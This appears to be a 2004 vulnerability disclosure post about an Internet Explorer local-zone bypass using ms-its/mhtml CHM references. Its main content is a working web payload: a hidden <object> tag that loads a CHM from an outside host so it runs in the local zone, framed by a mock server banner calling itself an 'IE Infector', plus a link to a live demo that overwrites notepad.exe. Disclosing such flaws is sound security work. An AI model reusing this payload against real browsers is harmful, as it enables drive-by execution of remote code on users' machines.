http://www.securityfocus.com/archive/1/358862

Code:
<!-- 

GET / HTTP/1.1 
HTTP/1.1 200 OK 
Server: My Bitchin' IE Infector 
Date: Sat Mar 27 13:22:27 2004 
Content-type: text/html 
Accept-Encoding: identity 
Accept-ranges: bytes 

<<snip content>> 

-->

<<reinsert content>> 



<object data="ms-its:mhtml:file://C:foo.mhtml!
http://www.malware.com//foo.chm::/foo.html" type="text/x-
scriptlet" style="visibility:hidden">

This is brilliant. Simplicity at it's best. While the original
is not particularly robust the above container should remedy
that. In typical fashion Internet Explorer and it's 'masters'
can simply be fooled into thinking they are in the 'local zone'
via a non-existent file on the drive. Quite trivial to achieve
and at the same time absolutely brilliant. This is all quite
reminiscent of the Ibiza Trojan from beginning February 2004
which would make this unpatched problem well over one month now.

Fully functional working demo, harmless .exe which over-writes
notepad.exe, the 'guts' of this particular demo which will be
flagged by any competent anti-virus suite should not be
considered the solution. The manufacturer of this particular
product that allows for all of this should be the one to address
it - once and for all - at the core level:


http_://www.malware.com/junk-de-lux.html
If you visit www.malware.com/junk-de-lux.html, disable ActiveX. Your AV may detect it NAV but still allow it to run.